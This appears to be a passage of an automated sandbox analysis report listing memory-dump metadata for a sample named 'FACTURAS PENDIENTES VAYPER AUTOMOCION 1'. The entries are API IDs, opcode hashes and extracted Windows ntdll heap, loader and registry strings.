                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                • Instruction ID: 9098bf4c1091865611e31995e4432c0f01cdde84f4a81288ed4074767029000f
                                • Opcode Fuzzy Hash: bd9da221314bd1aa7e68449dd2546843255206ea9281cf6d61f2e61d89fe453a
                                • Instruction Fuzzy Hash: 4C90023120248802D1157158950878A015547D0311F5DD412E5428618D86958A957121

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2 32522df0-32522dfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                • Instruction ID: 79b42483e59f6db2ebafd46d33cd99892196bd85a76985e76e78c621789691aa
                                • Opcode Fuzzy Hash: c23853c7a85e9c25f9daa650bf1a09333cebaccb5e94ca23f51648759131cc30
                                • Instruction Fuzzy Hash: DA90023120240413D11671585608747015947D0251F99D413E1428518D96568B56B121

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $ $0
                                • API String ID: 3446177414-3352262554
                                • Opcode ID: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                • Instruction ID: 16146015e5e0b045e5200cf4aeca2ddb21d78ea1d72a483d83ad3c7e619fd449
                                • Opcode Fuzzy Hash: d299caf0c7daf847d09da9f58394c57ef05ab55b3b87a236ddb625bcd9a96f11
                                • Instruction Fuzzy Hash: 9032F5B56083818FE310CF68C584B5BFBE5BB88348F50492DF59987350DBB5EA49CB52

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 3446177414-1700792311
                                • Opcode ID: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                • Instruction ID: a2a0b79f1320000134df6f934c82201d96c3ae20c9f2aa96ab5b5f8a4d92b171
                                • Opcode Fuzzy Hash: 6f28372ca79ea896845b7cc140c7f09bc5306322133772398acfec542af43ae2
                                • Instruction Fuzzy Hash: 63D1AC36901685DFDB06CF68C450AEDFBF1EF4A314F448899E889EB252DB749A81CF10
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/P2$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                • API String ID: 0-674978239
                                • Opcode ID: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                • Instruction ID: 0176c48ed6959e02b753351a9524f6dbef7188ffcfd57a7ba0f2c2d65773f2de
                                • Opcode Fuzzy Hash: 4f5df1c3d4e6388ca798b87a395674a6f0319106cd5555acb7a994e848c9568e
                                • Instruction Fuzzy Hash: FEB1EEB6808351DFD715CF24C8A0B5BBBE8AF88754F41092EF988D7241DB70DA49CB92
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                • API String ID: 3446177414-1745908468
                                • Opcode ID: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                • Instruction ID: 5011db66180615c67879835883c0a26dc3e9a88173bdf25dc12e2bf533f09e98
                                • Opcode Fuzzy Hash: 2cd28e9c2efb161c3b9a321127610dacf4a13e241ab21c68e7a70b4053f4af8e
                                • Instruction Fuzzy Hash: FB91CC35A01685DFEB06CF68C450A9DBBF2FF49314F94845DE845EB262CBB59A81CF10
                                Strings
                                Similarity
                                • API ID:
                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                • API String ID: 0-3591852110
                                • Opcode ID: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                • Instruction ID: adca2647442f944874057eb9c009592627c5656055447102e503db4701e33c2e
                                • Opcode Fuzzy Hash: dcbde4e1ba6b179765705c14b8a73610c2ec1e0c69cf73acb6682680b7e44242
                                • Instruction Fuzzy Hash: 8B128D74600762DFEB158F24C450BBABBF5EF09B54F54C89DE8868B642DB34EA81CB50
                                Strings
                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 324DD2C3
                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 324DD0CF
                                • H/P2, xrefs: 3253A843
                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 324DD196
                                • @, xrefs: 324DD2AF
                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 324DD146
                                • @, xrefs: 324DD313
                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 324DD262
                                • @, xrefs: 324DD0FD
                                Similarity
                                • API ID:
                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/P2$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                • API String ID: 0-3973197215
                                • Opcode ID: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                • Instruction ID: a89f89e457ec6d0c710f830b18ac6a0642751ec3b9192aa2f93a68e55da0f0bd
                                • Opcode Fuzzy Hash: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                • Instruction Fuzzy Hash: E3A15D76908345DFE711CF21C490B9BB7E8BF88755F40492EEA8896281DB74DA48CF93
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                • API String ID: 3446177414-3570731704
                                • Opcode ID: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                • Instruction ID: 99427c71fda525d0ec04198dbf8e5205cd18d1848af9f9b432b1c6a5dfdd3562
                                • Opcode Fuzzy Hash: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                • Instruction Fuzzy Hash: 81924475A01368DFEB24CF28C840B99B7B5AF85754F1181EAE84DAB380DB719E81CF51
                                APIs
                                • RtlDebugPrintTimes.NTDLL ref: 3250D959
                                  • Part of subcall function 324E4859: RtlDebugPrintTimes.NTDLL ref: 324E48F7
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                • API String ID: 3446177414-1975516107
                                • Opcode ID: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                • Instruction ID: 1662c5b5b2b54eb9dd7b8ed36f88cc948dfab0bbe4a6af34d68d671336e024e7
                                • Opcode Fuzzy Hash: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                • Instruction Fuzzy Hash: EC51BC75E063459BEB04CFA4CC8479DBBB1FF44728F548559D801AB281DBB1AA82CF90
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                • API String ID: 3446177414-3224558752
                                • Opcode ID: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                • Instruction ID: 3fa13cb8eab8c6c6f1c2aeab3fca085173bfef38aa1f0f8d08414e05c33e5e48
                                • Opcode Fuzzy Hash: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                • Instruction Fuzzy Hash: 66413575A01740DFE701CF28C994B6AFBB4EF40368F1085A9E8419B791CF78AA80CF91
                                Strings
                                Similarity
                                • API ID:
                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                • API String ID: 0-3063724069
                                • Opcode ID: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                • Instruction ID: d69845fa119f07e25be7db1021fdfc5a6b3db40c0a7e8b4aef0ff809c81d758a
                                • Opcode Fuzzy Hash: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                • Instruction Fuzzy Hash: EFD1C7B2845395AFD721CB58C940B9BBBE8AFC4754F814A2DF98497150E770CF488BA2
                                Strings
                                Similarity
                                • API ID:
                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-523794902
                                • Opcode ID: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                • Instruction ID: 8627010d87469f59aa042ba9b06964094997bca4a927bbefb9bfecf39d4c71fc
                                • Opcode Fuzzy Hash: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                • Instruction Fuzzy Hash: 1B42E0756053819FD715CF24C8A0B1ABBE5FF84348F05596DE885CB352DB34EA82CB92
                                Strings
                                Similarity
                                • API ID:
                                • String ID: H/P2$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-2399442170
                                • Opcode ID: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                • Instruction ID: 6cdd88b4827bb418b004110b97b876870fed42ddc238f0a87d0ebeac7039e49e
                                • Opcode Fuzzy Hash: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                • Instruction Fuzzy Hash: 05F13AB6D11219EFDB15CFA8C980ADEBBB9FF48750F51446AE501A7250EA709F01CFA0
                                Strings
                                Similarity
                                • API ID:
                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                • API String ID: 0-122214566
                                • Opcode ID: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                • Instruction ID: fb95ef0c225b60b6efa78ae9f4116da510c99bfbe8a7488b5b0dbc6d83161456
                                • Opcode Fuzzy Hash: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                • Instruction Fuzzy Hash: B3C13A71A00315BBEB148F64CC84B7EBBA5AFCA308F558069EC45AB390DFB5CA45C391
                                Strings
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                • Instruction ID: 342ff69bd6ceb92e8e65b2278c546c7889bb33dfa45d7aa9b313bed36a86e272
                                • Opcode Fuzzy Hash: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                • Instruction Fuzzy Hash: 72F1AE74A00605EFEB19CF68C890F6AB7F5FF94344F1091A9E8459B395DB31EA81CB90
                                Strings
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325502BD
                                • RTL: Re-Waiting, xrefs: 3255031E
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325502E7
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                • Instruction ID: d18105a63272b40c66d287ef8f58f59d3a60c7a80c800b5ae8ec050fa613a1de
                                • Opcode Fuzzy Hash: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                • Instruction Fuzzy Hash: D0E1C0756087419FE715CF28C880B1ABBE0BF88364F604A5EF495CB2E1DB74EA45CB42
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                • Instruction ID: 38505dd6ce1b7d8332c85a8066426ee1f6aa3d17c5de81d54067afd6e816bbfb
                                • Opcode Fuzzy Hash: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                • Instruction Fuzzy Hash: EDF10676E006118BDF08CF69C99167EFFF6AF98200B59416DD856DB380EAB4EA41CB50
                                Strings
                                Similarity
                                • API ID:
                                • String ID: This is located in the %s field of the heap header.$ -M2`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                • API String ID: 0-1754937585
                                • Opcode ID: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                • Instruction ID: 803f873d586b35b0e4d3bb37ee5fcd810fc8a8d731fb6d0a11ea17a986effce5
                                • Opcode Fuzzy Hash: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                • Instruction Fuzzy Hash: 2031F435101260EFEB05EB99C880F9677E8FF04B65F508499F842DB291DB70EE40DEA5
                                Strings
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                • Instruction ID: 77d74229d5c8ed434f149dda5479f8657fcf735338769bc8fcee7dcf8c2b7104
                                • Opcode Fuzzy Hash: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                • Instruction Fuzzy Hash: 9701F7374066C0DEE61A9728D529F62BBE4EF42B31F2440DDF5448BA52CEB4A981CA70
                                Strings
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                • Instruction ID: 5d53639b9f6d2326666e77174a7ca9befacf66680302a17007f8eda785e0c3bc
                                • Opcode Fuzzy Hash: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                • Instruction Fuzzy Hash: E213BF74A00755AFEB15CF68C9807A9BBF1FF88304F148159D845AF381DB76A992CF90
                                Strings
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UK2
                                • API String ID: 0-235712404
                                • Opcode ID: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                • Instruction ID: 613eef19373aacf2e258b32dbc1f41697f452c83cc8102a9643d26a788751171
                                • Opcode Fuzzy Hash: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                • Instruction Fuzzy Hash: 51B1DF76A06744AFEB15CF65C880B9DF7B5BF54368F644529E852EB7A0DB30EA40CB00
                                Strings
                                Similarity
                                • API ID:
                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UK2${
                                • API String ID: 0-1304081954
                                • Opcode ID: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                • Instruction ID: 6d8d332f88385d1e556483e347fb327fdc006b6ecc986d8a298f04881de327b0
                                • Opcode Fuzzy Hash: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                • Instruction Fuzzy Hash: 6A91F3B5902309DFFB15CF64C940B9DB7B0FF10769F604195E852AB3A0DB789A81CB91
                                Strings
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                • API String ID: 0-2586055223
                                Strings
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 0-1391187441
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$BuildLabEx$EQ2$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 0-22242143
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                Strings
                                Similarity
                                • API ID:
                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                • API String ID: 0-1168191160
                                Strings
                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 324E1728
                                • HEAP: , xrefs: 324E1596
                                • HEAP[%wZ]: , xrefs: 324E1712
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                Strings
                                • 'LDR: %s(), invalid image format of MUI file , xrefs: 32543AB4
                                • {, xrefs: 32543ABD
                                • LdrpLoadResourceFromAlternativeModule, xrefs: 32543AAF
                                Similarity
                                • API ID:
                                • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                • API String ID: 0-1697150599
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$@$\Registry\Machine\System\CurrentControlSet\Control\MUI\UILanguages
                                • API String ID: 0-1146358195
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                Strings
                                Similarity
                                • API ID:
                                • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                • API String ID: 0-3870751728
                                Strings
                                Similarity
                                • API ID:
                                • String ID: %$&$@
                                • API String ID: 0-1537733988
                                Strings
                                • TargetNtPath, xrefs: 325BB82F
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325BB82A
                                • GlobalizationUserSettings, xrefs: 325BB834
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                Strings
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3253E6C6
                                • HEAP: , xrefs: 3253E6B3
                                • HEAP[%wZ]: , xrefs: 3253E6A6
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                Strings
                                • minkernel\ntdll\ldrmap.c, xrefs: 3254A59A
                                • LdrpCompleteMapModule, xrefs: 3254A590
                                • Could not validate the crypto signature for DLL %wZ, xrefs: 3254A589
                                Similarity
                                • API ID:
                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                • API String ID: 0-1676968949
                                Strings
                                • HEAP: , xrefs: 3258DC1F
                                • HEAP[%wZ]: , xrefs: 3258DC12
                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3258DC32
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                • API String ID: 0-3815128232
                                Strings
                                • HEAP: , xrefs: 3253FB58
                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 3253FB63
                                • HEAP[%wZ]: , xrefs: 3253FB4B
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                • API String ID: 0-1596344177
                                Strings
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                • API String ID: 0-1151232445
                                Strings
                                • LdrpAllocateTls, xrefs: 32551B40
                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 32551B39
                                • minkernel\ntdll\ldrtls.c, xrefs: 32551B4A
                                Similarity
                                • API ID:
                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-4274184382
                                Strings
                                Similarity
                                • API ID:
                                • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-964947082
                                Strings
                                • SXS: %s() passed the empty activation context data, xrefs: 325529FE
                                • Actx , xrefs: 325133AC
                                • RtlCreateActivationContext, xrefs: 325529F9
                                Similarity
                                • API ID:
                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                • API String ID: 0-859632880
                                Strings
                                • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3256B632
                                • @, xrefs: 3256B670
                                • GlobalFlag, xrefs: 3256B68F
                                Similarity
                                • API ID:
                                • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                • API String ID: 0-4192008846
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                • API String ID: 0-1050206962
                                Strings
                                • DLL "%wZ" has TLS information at %p, xrefs: 32551A40
                                • minkernel\ntdll\ldrtls.c, xrefs: 32551A51
                                • LdrpInitializeTls, xrefs: 32551A47
                                Similarity
                                • API ID:
                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                • API String ID: 0-931879808
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: RtlValidateHeap
                                • API String ID: 3446177414-1797218451
                                APIs
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: kLsE
                                • API String ID: 3446177414-3058123920
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$@
                                • API String ID: 0-149943524
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @$AddD
                                • API String ID: 0-2525844869
                                Strings
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: $$$
                                • API String ID: 3446177414-233714265
                                Strings
                                Similarity
                                • API ID:
                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                • API String ID: 0-118005554
                                Strings
                                Similarity
                                • API ID:
                                • String ID: .Local\$@
                                • API String ID: 0-380025441
                                Strings
                                • RtlpInitializeAssemblyStorageMap, xrefs: 32552A90
                                • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32552A95
                                Similarity
                                • API ID:
                                • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                • API String ID: 0-2653619699
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @[]2@[]2
                                • API String ID: 0-983809011
                                APIs
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 325B3356
                                Similarity
                                • API ID: CallFilterFunc@8
                                • String ID:
                                • API String ID: 4062629308-0
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Strings
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                APIs
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                Strings
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                Strings
                                Similarity
                                • API ID:
                                • String ID: PreferredUILanguages
                                • API String ID: 0-1884656846
                                Strings
                                Similarity
                                • API ID:
                                • String ID: verifier.dll
                                • API String ID: 0-3265496382
                                Strings
                                Similarity
                                • API ID:
                                • String ID: #
                                • API String ID: 0-1885708031
                                Strings
                                Similarity
                                • API ID:
                                • String ID: Flst
                                • API String ID: 0-2374792617
                                Strings
                                Similarity
                                • API ID:
                                • String ID: g]2
                                • API String ID: 0-2701504074
                                Strings
                                Similarity
                                • API ID:
                                • String ID: Actx
                                • API String ID: 0-89312691
